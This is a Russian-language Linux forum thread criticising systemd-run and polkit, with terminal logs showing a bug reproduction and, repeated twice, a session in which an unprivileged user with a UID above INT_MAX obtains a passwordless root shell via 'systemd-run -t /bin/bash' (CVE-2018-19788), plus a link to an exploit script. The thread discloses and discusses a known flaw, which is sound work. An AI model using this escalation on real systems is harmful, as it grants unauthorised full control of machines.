"Systemd - капец" или systemd-run -t /bin/bash

[Speccyfighter]

...
Нет, root и user1 (wheel), это две учётки одного пользователя, - root.
Другие wheel, это соадминистаторы. И доступа к учётке root они не имеют и не должны иметь.
И только root наделяет их правами.
А root,  который сообщил свой пароль другим wheel, - шляпа.

Я так думал, потому что пользователь не в группе wheel, не мог выполнить su -l. Надо бы при случае проверить, как под таким пользователем отработается команда systemd-run -t /bin/bash

Она предлагает пройти аутентификацию через пароль одного из администраторов (не root!) существующих в системе (группа wheel) и прерывается по таймауту если ввод отсутствует.

Самое забавное в поднятом в этой теме то, что в systemd-run реализован грубый ляп недопустимый для системного программиста. Реализовывать доступ к root-овому шелл через политики polkit нельзя (да ещё и по собственному паролю соадминистратора). Доступ к святая святых системы, - root-овому шелл Эта ошибка исключается на этапе создания алгоритма работы программы. И в крайнем случае, на этапе отладки и тестирования программы. Такая грубая ошибка в systemd-run, это огромная брешь в безопасности.
В системах с такой ошибкой, нельзя создавать соадминистраторов.
В этом случае, root-овый шелл будет доступен только root: или из своего пользовательского аккаунта через su, или из него же этой командой через polkit, или прямым логином.
Почему Леннарту Поттерингу это непонятно?

[Speccyfighter]

Забавный баг:

Код: [Выделить]

# tail -n8 systemd-run_in_vcs3.txt
[tester@localhost ~]$ systemd-run -t /bin/bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ====
Для управления системными службами и юнитами, необходимо пройти аутентификацию.
Authenticating as: System Administrator (root)
Password: Failed to start transient service unit: Connection timed out
[tester@localhost ~]$ polkit-agent-helper-1: pam_authenticate failed: Application needs to call libpam again
[tester@localhost ~]$ [tester@localhost ~]$ [tester@localhost ~]$ ^C
[tester@localhost ~]$ [tester@localhost ~]$ [tester@localhost ~]$ [tester@localhost ~]$

Воспроизведение:
Переместить в бэкап

Код: [Выделить]

/etc/polkit-1/rules.d/50-default.rules

Перейти в tty

Выполнить от администратора (wheel)

Код: [Выделить]

$ systemd-run -t /bin/bash

Пароль не вводить.
Вывалится с ошибкой по таймауту.
Последующие попытки нажать Enter, приведут к печати приглашения в строку.
Словилось на лайве стартеркита mate.
Вытащено через fold.

Пользователи systemd могут воспроизвести и отрепортить баг.

Метод сохранения в файл:
Определить количество колонок в tty

Код: [Выделить]

# stty -a | sed 's/;/\n/g' | grep columns

Выполнить сохранение в ascii файл вывода в ttyN

Код: [Выделить]

# fold -w $columns /dev/vcsN

где:
$columns - количество колонок в tty
N в vcsN - номер в виртуальной консоли

Кириллицу команда не сохраняет.

Удалить табуляцию и пробелы в конце строк

Код: [Выделить]

# sed -i 's/[ \t]*$//' file.txt


[Speccyfighter]

Где упоминается unix-group

Код: [Выделить]

# grep -r unix-group /etc/ 2>/dev/null
/etc/polkit-1/rules.d/50-default.rules.bak:    return ["unix-group:wheel"];
/etc/polkit-1/localauthority/50-local.d/01-cpufreq.pkla:Identity=unix-group:wheel


Код: [Выделить]

# grep -r unix-group /usr 2>/dev/null
Двоичный файл /usr/lib/libpolkit-gobject-1.so.0.0.0 совпадает
/usr/share/doc/util-linux-2.30.2/poeigl.txt: ttys and do access checking based on unix-group membership. See


[Speccyfighter]

Набираю в терминале от пользователя systemd-run -t /bin/bash ввожу пароль пользователя и попадаю в консоль root!!!

Ёлы-палы...
Хуже всего то, что в системе этого root-а не видно:

Код: [Выделить]

$ who
altlinux :0           2019-02-21 23:48 (:0)
altlinux pts/0        2019-02-21 23:48 (:0)
altlinux pts/1        2019-02-21 23:49 (:0)
altlinux pts/2        2019-02-21 23:49 (:0)
altlinux pts/3        2019-02-21 23:49 (:0)
altlinux tty4         2019-02-22 01:22 (localhost)

И только в журнале можно увидеть кто выполнял команду и от чьего имени:

Код: [Выделить]

$ journalctl | grep 'systemd-run -t /bin/bash' | tail -n2
фев 22 01:22:24 localhost.localdomain polkitd[662]: Operator of unix-process:3351:571428 successfully authenticated as unix-user:altlinux to gain TEMPORARY authorization for action org.freedesktop.systemd1.manage-units for system-bus-name::1.118 [systemd-run -t /bin/bash] (owned by unix-user:altlinux)
фев 22 01:22:35 localhost.localdomain polkitd[662]: Operator of unix-process:3372:572484 successfully authenticated as unix-user:tester to gain TEMPORARY authorization for action org.freedesktop.systemd1.manage-units for system-bus-name::1.121 [systemd-run -t /bin/bash] (owned by unix-user:altlinux)

да в процессах, если оно ещё висит:

Код: [Выделить]

$ ps -eo pid,user,command | grep systemd-run | grep -v grep
 3351 altlinux systemd-run -t /bin/bash
 3372 altlinux systemd-run -t /bin/bash

Используя эту дыру, можно втихаря лихо дров наломать.
Это как в том анекдоте:
- Ты видишь суслика?
- Нет.
- А он есть.

[Speccyfighter]

Лихо...
(p8)
Непривилегированный пользователь может получить полный контроль на системой без запроса пароля:

Код: [Выделить]

# head -n 20 systemd-run_in_vcs2.txt

Hello friend, say `altlinux' to log in at tty2
localhost login: testsdrun
Password:
[testsdrun@localhost ~]$ whoami
testsdrun
[testsdrun@localhost ~]$ groups
testsdrun
[testsdrun@localhost ~]$ LC_ALL=C id
uid=2147483648(testsdrun) gid=503(testsdrun) groups=503(testsdrun)
[testsdrun@localhost ~]$
[testsdrun@localhost ~]$ systemd-run -t /bin/bash

(pkttyagent:4234): GLib-GObject-WARNING **: value "-2147483648" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
Running as unit: run-u136.service
Press ^] three times within 1s to disconnect TTY.
[root@localhost /]#
[root@localhost /]# whoami
root
[root@localhost /]#

На системах с sysvinit эта лазейка не работает, за отсутствием в них systemd.

[Speccyfighter]

...
Непривилегированный пользователь может получить полный контроль на системой без запроса пароля:
...
На системах с sysvinit эта лазейка не работает, за отсутствием в них systemd.

Леннарт, вот скажи мне, а с какого перепугу, наткнувшись на invalid or out of range for property 'uid' ты не прервал выполнение?
Т.е. код ты написал от балды, не тестировал его и разрешил беспарольное получение root?
Леннарт, ты же поганец сам это написал и знал, что property 'uid' может быть в out of range. И тем не менее разрешил продолжить выполнение.

[Kalt]

Майнер маскировался под процесс systemd

...Это отсюда:
https://xakep.ru/2018/05/14/snap-store-miner/
https://xakep.ru/2019/02/14/dirty-sock/

[Speccyfighter]

19.02.2019 10:12  Уязвимость в systemd, которую можно использовать для блокирования работы системы

[Speccyfighter]

Лихо...
(p8)
Непривилегированный пользователь может получить полный контроль на системой без запроса пароля:

Код: [Выделить]

# head -n 20 systemd-run_in_vcs2.txt

Hello friend, say `altlinux' to log in at tty2
localhost login: testsdrun
Password:
[testsdrun@localhost ~]$ whoami
testsdrun
[testsdrun@localhost ~]$ groups
testsdrun
[testsdrun@localhost ~]$ LC_ALL=C id
uid=2147483648(testsdrun) gid=503(testsdrun) groups=503(testsdrun)
[testsdrun@localhost ~]$
[testsdrun@localhost ~]$ systemd-run -t /bin/bash

(pkttyagent:4234): GLib-GObject-WARNING **: value "-2147483648" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
Running as unit: run-u136.service
Press ^] three times within 1s to disconnect TTY.
[root@localhost /]#
[root@localhost /]# whoami
root
[root@localhost /]#

На системах с sysvinit эта лазейка не работает, за отсутствием в них systemd.

Уязвимости подвержены все версии systemd начиная с версии 219:
17.02.2015 17:48  Выпуск systemd 219 с поддержкой расширенных возможностей Btrfs

В systemd-run добавлена опция "-t" ("--pty"), позволяющая запустить процесс как системный сервиc, но сохранить возможность интерактивного управления им через терминал. В том числе, можно запустить "systemd-run -t /bin/bash" без создания отдельного сеанса входа;

Уязвимость systemd: Отсутствие блокировки запуска при out of range.
При UID превышающем INT_MAX, непривилегированый пользователь получает беспарольный root и полный контроль над системой.
Эксплоит:
https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh